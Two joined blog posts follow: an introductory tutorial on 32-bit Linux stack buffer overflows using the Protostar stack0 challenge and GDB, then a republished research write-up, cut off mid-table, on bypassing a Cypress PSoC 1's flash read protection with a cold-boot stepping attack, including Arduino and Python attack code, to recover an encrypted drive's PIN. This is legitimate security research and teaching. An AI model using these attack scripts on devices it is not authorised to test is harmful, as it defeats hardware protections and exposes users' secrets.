## Getting Started with Linux Buffer Overflows x86 – Part 1 (Introduction)

Hello Friends, this series of blog posts will purely focus on Buffer Overflows. When I started my journey in Infosec, this one topic fascinated me as much as it frightened me. When I read some of the blogs related to Buffer Overflows, it really seemed as some High-level gibber jabber containing C code, Assembly and some black terminals (Yeah I am talking about GDB). Over the period of time and preparing for OSCP, I started to learn about Buffer Overflows in detail referring to the endless materials on Web scattered over different planets. So, I will try to explain Buffer Overflow in depth and detail so everyone reading this blog can understand what actually a Buffer Overflow is.

In this blog, we will understand the basic fundamentals behind the Buffer Overflow vulnerability. Buffer Overflow is a memory corruption attack which involves memory, stack, buffers to name a few. We will go through each of this and understand why really Buffer Overflows takes place in the first place. We will focus on 32-bit architecture.

A little heads up: This blog is going to be a lengthy one because to understand the concepts of Buffer Overflow, we have to understand the process memory, stack, stack operations, assembly language and how to use a debugger. I will try to explain as much as I can. So I strongly suggest to stick till the end and it will surely clear your concepts. Also, from the next blog I will try to keep it short :p :p

So lets get started….
Before getting to stack and buffers, it is really important to understand the Process Memory Organization. Process Memory is the main playground where it all happens. In theory, the Process memory where the program/process resides is quite a complex place. We will see the basic part which we need for Buffer Overflow. It consists of three main regions: Text, Data and Stack.

Text: The Text region contains the Program Code (basically instructions) of the executable or the process which will be executed. The Text area is marked as read-only and writing any data to this area will result into Segmentation Violation (Memory Protection Mechanism).

Data: The Data region consists of the variables which are declared inside the program. This area has both initialized (data defined while coding) and uninitialized (data declared while coding) data. Static variables are stored in this section.

Stack: While executing a program, there are many function and procedure calls along with many JUMP instructions which after the functions work is done has to return to its next intended place. To carry out this operation, to execute a program, the memory has an area called Stack. Whenever the CALL instruction is used to call a function, the stack is used. The Stack is basically a data structure which works on the LIFO (Last In First Out) principle. That means the last object entering the stack is the first object to get out. We will see how a stack works in detail below.

To understand more about the Process Memory read this fantastic article: https://www.bottomupcs.com/elements_of_a_process.xhtml

So Lets see an Assembly Code Skeleton to understand more about how the program is executed in Process Memory.

Here, as we can see the assembly program skeleton has three sections: .data, .bss and .txt

-> .txt section contains the assembly code instructions which resides in the Text section of the process memory.

-> .data section contains the initialized data or lets say defined variables or data types which resides in the Data section of the process memory.

-> .bss section contains the uninitialized data or lets say declared variables that will be used later in the program execution which also resides in the Data section of the process memory

However in a traditionally compiled program there may be many sections other than this.

Now the most important part….

HOLY STACK!!!

As we discussed earlier all the dirty work is done on the Stack. Stack is nothing but a region of memory where data is temporarily stored to carry out some operations. There are mainly two operations performed by stack: PUSH and POPPUSH is used to add the object on top of the stack, POP is used to remove the object from top of the stack.

But why stack is used in the first place?

Most of the programs have functions and procedures in them. So during the program execution flow, when the function is called, the flow of control is passed to the stack. That means when the function is called, all the operations which will take place inside the function will be carried out on the Stack. Now, when we talk about flow of control, after when the execution of the function is done, the stack has to return the flow of control to the next instruction after which the function was called in the program. This is a very important feature of the stack.

So, lets see how the Stack works. But before that, lets get familiar with some stack pointers and registers which actually carries out everything on the Stack.

ESP (Extended Stack Pointer): ESP is a stack register which points to the top of the stack.

EBP (Extended Base Pointer): EBP is a stack register which points to the top of the current frame when a function is called. EBP generally points to the return address. EBP is really essential in the stack operations because when the function is called, function arguments and local variables are stored onto the stack. As the stack grows the offset of both the function arguments and variables changes with respect to ESP. So ESP is changed many times and it is difficult for the compiler to keep track, hence EBP was introduced. When the function is called, the value of ESP is copied into EBP, thus making EBP the offset reference point for other instructions to access and calculate the memory addresses.

EIP (Extended Instruction Pointer): EIP is a stack register which tells the processor about the address of the next instruction to execute.

RET (return) address: Return address is basically the address to which the flow of control has to be passed after the stack operation is finished.

Stack Frame: A stack frame is a region on stack which contains all the function parameters, local variables, return address, value of instruction pointer at the time of a function call.

Okay, so now lets see the stack closely by executing a C program. For this blog post we will be using the program challenge ‘stack0’ from Protostar exploit series, which is a stack based buffer overflow challenge series.
You can find more about Protostar exploit series here -> https://exploit-exercises.com/protostar/

The program:

An int variable modified is declared and a char array buffer of 64 bytes is declared. Then modified is set to 0 and user input is accepted in buffer using gets() function. The value of modified is checked, if its anything other than 0 then the message “you have changed the ‘modified’ variable” will be printed or else “Try again?” will be printed.

Lets execute the program once and see what happens.

So after executing the program, it asks for user input, after giving the string “IamGrooooot” it displays “Try again?”. By seeing the output it is clear that modified variable is still 0.

Now lets try to debug this executable in a debugger, we will be using GDB throughout this blogpost series (Why? Because its freaking awesome).

Just type gdb ./executable_name to execute the program in the debugger.

The first thing we do after firing up gdb is disassembling the main() function of our program.

We can see the main() function now, its in assembly language. So lets try to understand what actually this means.

From the address 0x080483f4 the main() function is getting started.
-> Since there is no arguments passed in the main function, directly the EBP is pushed on the stack.
As we know EBP is the base pointer on the stack, the Stack pushes some starting address onto the EBP and saves it for later purposes.

-> Next, the value of ESP is moved into EBP. The value of ESP is saved into EBP. This is done so that most of the operations carried out by the function arguments and the variable changes the ESP and it is difficult for the compiler to keep track of all the changes in ESP.

-> Many times the compiler add some instructions for better alignment of the stack. The instruction at the address 0x080483f7 is masking the ESP and adding some trailing zeros to the ESP. This instruction is not important to us.

-> The next instruction at address 0x080483fa is subtracting 0x60 hex value from the ESP. Now the ESP is pointing to a far lower address from the EBP(As we know the stack grows down the memory). This gap between the ESP and EBP is basically the Stack frame, where the operations needed to execute the program is done.

-> Now the instruction at address 0x080483fd is from where all our C code will make sense. Here we can see the instruction movl \$0x0,0x5c(%esp) where the value 0 is moved into ESP + the offset 0x5c, that means 0 is moved to the address [ESP+0x5c]. This is same as in our program, modified=0.

-> From address 0x08048405 to 0x0804840c are the instructions with accepts the user input.
The instruction lea 0x1c(%esp),%eax is loading the effective address i.e [ESP+0x1c] into EAX register. This address is pointing to the char array buffer on the stack. The lea and mov instructions are almost same, the only difference is the leainstruction copies the address of the register and offset into the destination instead of the content(which the mov instruction does).

-> The instruction mov %eax,(%esp) is copying the address stored in EAX register into ESP. So the top of the stack is pointing to the address 0x1c(%esp). Another important thing is that the function parameters are stored in the ESP. Assuming that the next instruction is calling gets function, the gets function will write the data to a char array. In this case the ESP is pointing to the address of the char buffer and the gets function writes the data to ESP(i.e the char array at the address 0x1c(%esp) ).

-> From the address 0x08048411 to 0x0804842e, the if condition is carried out. The instruction mov 0x5c(%esp),%eax is copying the value of modified variable i.e 0 into EAX. Then the test instruction is checking whether the value of modifiedis changed or not. If the value is not changed i.e the je instruction’s output is equal then the flow of control will jump to 0x08048427 where the message “Try again?” will be printed. If the value is changed then flow of control will be normal and the next instruction will be executed, thus printing the message “you have changed the ‘modified’ variable”.

-> Now all the opertions are done. But the stack is as it is and for the program to be completed the flow control has to be passed to the RET address which is stored on the stack. But till now only variables and addresses has been pushed on the stack but nothing has been popped. At the address 0x08048433 the leave instruction is executed. The leave instruction is used to “free” the stack frame. If we see the disassemble main() the first two instructions push %ebp and push %esp,%ebp, these instructions basically sets up the stack frame. Now the leave instruction does exactly the opposite of what the first two instructions did, mov %ebp,%esp and pop %ebp. So these two instructions free ups stack frame and the EIP points to the RET address which will give the flow of control to the address which was next after the called function. In this case the RET value is not pointing to anything because our program ends here.

So till now we have seen what our C code in Assembly means, it is really important to understand these things because when we debug or lets say Reverse Engineer some binary and stuff, this understanding of how closely the memory and stack works really comes in handy.

Now we will see the stack operations in GDB. For those who will be doing debugging and reversing for the first time it may feel overwhelming seeing all these instructions(believe me, I used to go nuts sometimes), so for the moment we will focus only on the part which is required for this series to understand, like where is our input being written, how the memory addresses can be overwritten and all those stuffs….

Here comes the mighty GDB !!!!

In GDB we will list the program, so we can know where we want to set a breakpoint.

We will set the breakpoint for line number 7,11,13Lets run it in GDB..-> After we run it in GDB, we can see the breakpoints which we set is now hit, basically it is interrupting the program execution and halting the program flow at the given breakpoint.

-> We step to next instruction by typing s in the prompt, we can again see the next breakpoint gets hit.

-> At this point we check both our stack registers ESP and EIP. We look these two registers in two different ways. We check the ESP using the x switch which is for examine memory. We can see the ESP is pointing to the stack address 0xbffff0b0and the value it contains is 0x00000000 i.e 0. We can easily assume that, this 0 is the same 0 which gets assigned to the modified variable.

-> We check the EIP by the command info registers eip (you can see info about all the registers by simply typing info registers). We see the EIP is pointing to the memory address 0x8048405 which is nothing but the address of next instruction to be executed.

Now we step next and see what happens.-> When we step through the next instruction it asks us for the input. Now we give the input as random sets of ‘A’ and then we can see our third breakpoint which we set earlier is hit.

-> We again check the ESP and EIP. We clearly see the ESP is changed and pointing to different stack address. EIP now is pointing to the next instruction which is going to be executed.

Now lets see, the input which we gave where does it goes?-> By using the examine memory switch i.e x we see the contents of ESP. We are viewing the 24 words of content on the stack in Hex (thats why x/24xw \$esp). We can see our input ‘A’ that is 41 in hex (according to the ASCII standards) on the stack(highlighted portion). So we can see that our input is being written on the stack.

Again lets step through the next instruction.-> In the previous step we saw that the instruction if(modified !=0) is going to be executed. Now lets go back to the section where we saw the assembly instructions equivalent of the C program in detail. We can see the instruction test %eax,%eaxwill be executed. So we already know it will compare if the modified value has changed or not.

How do we see that ?

-> We simply check the EAX register by typing info registers eax. We can see that the value of EAX is 0x0 i.e 0, that means the value of modified variable is still 0. Now we know that the message “Try again?” is going to be printed. The EIP also confirms this, the output of EIP points to 0x8048427 which if you look at the disassembled main function, you can see that it is calling the second puts function which has the message “Try again?”.

Lets step and move towards the exit of the program.-> When we step through the next instruction, it gives us the message “Try again?”. Then we check the EIP it points to 0x8048433, which is nothing but the leaveinstruction. Again we step through, we can the program exiting and terminated with the exit system call that is in the libc.s0.6 shared library files.

WOAH!!!!!

Till now, we saw the how the process memory works, how the programs gets loaded into the memory and how the stack operations are done when the program gets executed. Now this was more than enough to understand what Buffer Overflow really is.

BUFFER OVERFLOW

Finally we can get started with the topic. Lets ask ourselves two very simple questions:

What is a Buffer?
-> Buffer is a temporary storage place in memory to store data.

What is Buffer Overflow?
-> When a data written to a buffer that is larger than the actual buffer size and due to improper bounds checking it gets overflowed and overwrites the adjacent memory addresses/locations.

So, its time to get our hands dirty by smashing the stack. But before that, for this blogpost series we will only focus on the Stack based overflows. Also the examples which we are going to see may not be vulnerable to buffer overflow because the newer system kernels handle all these things in a very effifcient way. If you are using a newer system, for e.g Ubuntu 16.04 LTS you have to go and disable the ASLR bit to off as it is set to protect from the Memory Corruption attacks.
To disable it simply type : echo 0 > /proc/sys/kernel/randomize_va_space in your terminal.

Also you have to compile the program using gcc with stack smashing detect feature disabled. To do this compile your program using:

We will use the earlier program which we used for understanding the stack. This program is vulnerable to buffer overflow. As we can see the the program is using gets function to accept the user input. Now, this gets function has some serious security issues. Lets see the man page for gets.As, we can see the highlighted part it says “Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead”.

From here we can understand there is actually no bound checks happening when the user input is taken through the gets function (Extremely Dangerous Right?).

Now lets look what the program is and what the challenge of the program is all about.
-> We already discussed that if the modified variable is not 0, then the message “you have changed the ‘modified’ variable” will be printed. But if we look at the program, there is no way the modified variable’s value can be changed. So how it can be done?

-> The line where it takes user input and writes into char array buffer is actually our way to go and change the value of modified. The gets(buffer); is the vulnerable code.

In the code we can see the modified variable assignment and the input of char array buffer is next to each other,

This means when this two instructions will be executed by the processor the modified variable and buffer array will be adjacent to each other in the stack frame.

So, what does this means?
-> When we feed input to the buffer more than it is capable of, the extra input which we feed will get overwritten to the adjacent memory location, in this case the memory location pointing to the modified variable. Thus, the modified variable will be no longer be 0 and the success message will be printed.

Due to buffer overflow the above scenario was possible. Lets see in more detail.

First we will try to execute the program with some random input and see where the overflow happens.-> We already know the char array buffer is of 64 bytes. So we try to enter 60, 62, 64 times ‘A’ to our program. As, we can see the modified variable is not changed and the failure message is printed.

->But when we enter 65 A’s to our program, the value of modified variable mysteriously changes and the success message is printed.

->The buffer overflow has happened after the 64th byte of input and it overwrites the memory location after that i.e where the modified variable is stored.

Lets load our program in GDB and see how the modified variable’s memory location got overwritten.-> As we can see, the breakpoints 1 and 2 got hit, then we check the value of modified by typing x/xw \$esp+0x5c (stack register + offset). If we see in the disassembled main function we can see the value 0 gets assigned to modifiedvariable through this instruction: movl \$0x0,0x5c(%esp), that’s why we checked the value of modified variable by giving the offset along with the stack register ESP. The value of modified variable at stack location 0xbffff10c is 0x00000000.

->After stepping through, its asking us to enter the input. Now we know 65th byte is the point where the buffer gets overflowed. So we enter 65 A’s and then check the stack frame.

-> As we can see our input A i.e 41 is all over the stack. But we are only concerned with the adjacent memory location where the modified variable is there. By quickly checking the modified variable we can see the value of the stack address pointing to the modified variable 0xbffff10c is changed from 0x00000000 to 0x00000041.

-> This means when the buffer overflow took place it overwritten the adjacent memory location 0xbffff10c to 0x00000041.

-> As we step through the next instruction we can see the success message “you have changed the ‘modified’ variable” printed on the screen.

This was all possible because there was insufficient bounds checking when the user input was being written in the char array buffer. This led to overflow and the adjacent memory location (modified variable) got overwritten.

Voila !!!

We successfully learned the fundamentals of process memory, Stack operations and Buffer Overflow in detail. Now, this was only the concept of how buffer overflow takes place. We still haven’t exploited this vulnerability to actually exploit the system. In the next blog we will see how to execute arbitrary commands through Shellcode using this Buffer Overflow vulnerablity.

Till then, go and learn as much as possible about Assembly and GDB, because we are going to use this extensively in the future blogposts.

Реклама

## Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

### TL;DR

I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).

It allows me to dump the PIN of the hard-drive from part 1 directly:

``````\$ ./psoc.py
syncing:  KO  OK
[...]
PIN:  1 2 3 4 5 6 7 8 9
``````

Code:

## Introduction

So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.

Our goal is to read its internal flash memory and so, the steps we have to cover here are to:

• manage to “talk” to the microcontroller
• find a way to check if it is protected against external reads (most probably)
• find a way to bypass the protection

There are 2 places where we can look for the valid PIN:

• the internal flash memory
• the SRAM, where it may be stored to compare it to the PIN entered by the user

## ISSP Protocol

### ISSP ??

“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).

Cypress’ own proprietary protocol is called ISSP for “in-system serial programming protocol”, and is (partially) described in its documentationUS Patent US7185162 also gives some information.

There is also an open source implemention called HSSP, which we will use later.

ISSP basically works like this:

• reset the µC
• output a magic number to the serial data pin of the µC to enter external programming mode
• send commands, which are actually long strings of bits called “vectors”

The ISSP documentation only defines a handful of such vectors:

• Initialize-1
• Initialize-2
• Initialize-3 (3V and 5V variants)
• ID-SETUP
• SET-BLOCK-NUM: `10011111010dddddddd111` where dddddddd=block #
• BULK ERASE
• PROGRAM-BLOCK
• VERIFY-SETUP
• READ-BYTE: `10110aaaaaaZDDDDDDDDZ1` where DDDDDDDD = data out, aaaaaa = address (6 bits)
• WRITE-BYTE: `10010aaaaaadddddddd111` where dddddddd = data in, aaaaaa = address (6 bits)
• SECURE
• CHECKSUM-SETUP
• READ-CHECKSUM: `10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1` where DDDDDDDDDDDDDDDD = Device Checksum data out
• ERASE BLOCK

For example, the vector for `Initialize-2` is:

``````1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111
``````

Each vector is 22 bits long and seem to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”

### Demystifying the vectors

Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.

Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much details, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”

Then, reading the Techical reference manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:

• 00h : SWBootReset
• 02h : WriteBlock
• 03h : EraseBlock
• 07h : CheckSum
• 08h : Calibrate0
• 09h : Calibrate1

By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.

This gives us a decoding of the first 3 bits :

• 100 => “wrmem”
• 101 => “rdmem”
• 110 => “wrreg”
• 111 => “rdreg”

But to fully understand what is going on, it is better to be able to interact with the µC.

### Talking to the PSoC

As Dirk Petrautzki already ported Cypress’ HSSP code on Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.

Note that over the course of my research, I modified Dirk’s code quite a lot, you can find my fork on GitHub: here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the “official” vectors to interact, and in order to try to read the internal ROM using the `VERIFY` command. Which failed, as expected, most probably because of the flash protection bits.

I then built my own simple vectors to read/write memory/registers.

Note that we can read the whole SRAM, even though the flash is protected !

### Identifying internal registers

After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !

This allowed me to run various opcodes such as `ADD``MOV A,X``PUSH` or `JMP`, which, by looking at the side effects on all the registers, allowed me to identify which undocumented registers actually are the “usual” ones (`A``X``SP` and `PC`).

In the end, the vector’s “dissassembly” generated by `HSSP_disas.rb` looks like this, with comments added for clarity:

``````--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00      # reset flags
[DE C0 1C] wrreg SP (f6), 0x00         # reset SP
[9F 07 5C] wrmem KEY1, 0x3A            # Mandatory arg for SSC
[9F 20 7C] wrmem KEY2, 0x03            # same
[DE A0 1C] wrreg PCh (f5), 0x00        # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03        # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80         # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30       # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40       # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01         # BLOCK ID for SSC call
[DE 00 DC] wrreg A (f0), 0x06          # "Syscall" number : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00       # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12   # Undocumented op: execute external opcodes
``````

### Security bits

At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give any mean to the users to check the protection’s status. So, I dug a bit more on Google to finally realize that the HSSP code provided by Cypress was updated after Dirk’s fork.

And lo ! The following new vector appears:

``````[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00           # Unknown args
[9F E0 1C] wrmem 0xFF, 0x00           # same
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10         # Undocumented syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12
``````

By using this vector (see `read_security_data` in `psoc.py`), we get all the protection bits in SRAM at 0x80, with 2 bits per block.

The result is depressing: everything is protected in “Disable external read and write” mode ; so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip 🙁

## First (failed) attack: `ROMX`

However, we can try a trick: since we can execute arbitrary opcodes, why not execute `ROMX`, which is used to read the flash ?

The reasoning here is that the SROM `ReadBlock` function used by the programming vectors will verify if it is called from ISSP. However, the `ROMX` opcode probably has no such check.

So, in Python (after adding a few helpers in the Arduino C code):

``````for i in range(0, 8192):
write_reg(0xF0, i>>8)        # A = 0
write_reg(0xF3, i&0xFF)      # X = 0
exec_opcodes("\x28\x30\x40") # ROMX, HALT, NOP
print "%02x" % ord(byte[0])  # print ROM byte
``````

Unfortunately, it does not work 🙁 Or rather, it works, but we get our own opcodes (`0x28 0x30 0x40`) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.

## Second attack: cold boot stepping

Since `ROMX` did not work, I thought about using a variation of the trick described in section 3.1 of Johannes Obermaier and Stefan Tatschner’s paper: Shedding too much Light on a Microcontroller’s Firmware Protection.

### Implementation

The ISSP manual give us the following `CHECKSUM-SETUP` vector:

``````[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12
``````

Which is just a call to SROM function `0x07`, documented as follows (emphasis mine):

The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum func- tion must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.

Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).

So the final attack is, in theory:

1. Connect using ISSP
2. Start a checksum computation using the `CHECKSUM-SETUP` vector
3. Reset the CPU after some time T
4. Read the RAM to get the current checksum C
5. Repeat 3. and 4., increasing T a little each time
6. Recover the flash content by substracting consecutive checkums C

However, we have a problem: the `Initialize-1` vector, which we have to send after reset, overwrites KEY1 and KEY:

``````1100101000000000000000                 # Magic to put the PSoC in prog mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A            # Checksum overwritten here
[9F 20 7C] wrmem KEY2, 0x03            # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09          # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00       # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12
``````

But this code, overwriting our precious checksum, is just calling `Calibrate1` (SROM function 9)… Maybe we can just send the magic to enter prog mode and then read the SRAM ?

And yes, it works !

The Arduino code implementing the attack is quite simple:

``````    case Cmnd_STK_START_CSUM:
checksum_delay = ((uint32_t)getch())<<24;
checksum_delay |= ((uint32_t)getch())<<16;
checksum_delay |= ((uint32_t)getch())<<8;
checksum_delay |= getch();
if(checksum_delay > 10000) {
ms_delay = checksum_delay/1000;
checksum_delay = checksum_delay%1000;
}
else {
ms_delay = 0;
}
send_checksum_v();
if(checksum_delay)
delayMicroseconds(checksum_delay);
delay(ms_delay);
start_pmode();
``````
1. It reads the `checkum_delay`
2. Starts computing the checkum (`send_checksum_v`)
3. Waits for the appropriate amount of time, with some caveats:
• I lost some time here until I realized delayMicroseconds is precise only up to 16383µs)
• and then again because `delayMicroseconds(0)` is totally wrong !
4. Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)

The final Python code is:

``````for delay in range(0, 150000):                          # delay in microseconds
for i in range(0, 10):                              # number of reads for each delay
try:
reset_psoc(quiet=True)                      # reset and enter prog mode
send_vectors()                              # send init vectors
ser.write("\x85"+struct.pack(">I", delay))  # do checksum + reset after delay
except Exception as e:
print e
ser.close()
os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # open serial port
continue
print "%05d %02X %02X %02X" % (delay,           # read RAM bytes
``````

What it does is simple:

1. Reset the PSoC (and send the magic)
2. Send the full initialization vectors
3. Call the `Cmnd_STK_START_CSUM` (0x85) function on the Arduino, with a `delay` argument in microseconds.
4. Reads the checksum (0xF8 and 0xF9) and the `0xF1` undocumented registers

This, 10 times per 1 microsecond step.

`0xF1` is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?

Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).

The output of the Python script looks like this (simplified for readability):

``````DELAY F1 F8 F9  # F1 is the unknown reg
# F8 is the checksum LSB
# F9 is the checksum MSB

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # Checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # First byte is 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 is back ?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Oh ! Carry is propagated to MSB
00063 01 17 01
[...]
00075 CC 17 01  # So 0x117-0xE7: 0x30
``````

We however have the the problem that since we have a real check sum, a null byte will not change the value, so we cannot only look for changes in the checksum. But, since the full (8192 bytes) computation runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.

Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:

``````134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD
``````

Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.

### Reconstructing the flash image

I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:

``````0000: 80 67     jmp   0068h         ; Reset vector
[...]
0068: 71 10     or    F,010h
006a: 62 e3 87  mov   reg[VLT_CR],087h
006d: 70 ef     and   F,0efh
006f: 41 fe fb  and   reg[CPU_SCR1],0fbh
0072: 50 80     mov   A,080h
0074: 4e        swap  A,SP
0075: 55 fa 01  mov   [0fah],001h
0078: 4f        mov   X,SP
0079: 5b        mov   A,X
007c: 53 f9     mov   [0f9h],A
007e: 55 f8 3a  mov   [0f8h],03ah
0081: 50 06     mov   A,006h
0083: 00        ssc
[...]
0122: 18        pop   A
0123: 71 10     or    F,010h
0125: 43 e3 10  or    reg[VLT_CR],010h
0128: 70 00     and   F,000h ; Paging mode changed from 3 to 0
012a: ef 62     jacc  008dh
012c: e0 00     jacc  012dh
012e: 71 10     or    F,010h
0130: 62 e0 02  mov   reg[OSC_CR0],002h
0133: 70 ef     and   F,0efh
0135: 62 e2 00  mov   reg[INT_VC],000h
0138: 7c 19 30  lcall 1930h
013b: 8f ff     jmp   013bh
013d: 50 08     mov   A,008h
013f: 7f        ret
``````

It looks good !

Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:

• entering a wrong PIN
• changing the PIN

First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.

The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. Which was actually completely false and an artefact of `delayMicroseconds`doing non-sense when called with `0`.

Then, after losing about 3 hours, I remembered that the SROM’s `CheckSum` syscall has an argument that allows to specify the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.

My initial runs gave:

``````No bad PIN          |   14 tries remaining  |   13 tries remaining
|                       |
block 125 : 0x47E2  |   block 125 : 0x47E2  |   block 125 : 0x47E2
block 126 : 0x6385  |   block 126 : 0x634F  |   block 126 : 0x6324
block 127 : 0x6385  |   block 127 : 0x634F  |   block 127 : 0x6324
block 128 : 0x82BC  |   block 128 : 0x8286  |   block 128 : 0x825B
``````

Then I changed the PIN from “123456” to “1234567”, and I got:

``````No bad try            14 tries remaining
block 125 : 0x47E2    block 125 : 0x47E2
block 126 : 0x63BE    block 126 : 0x6355
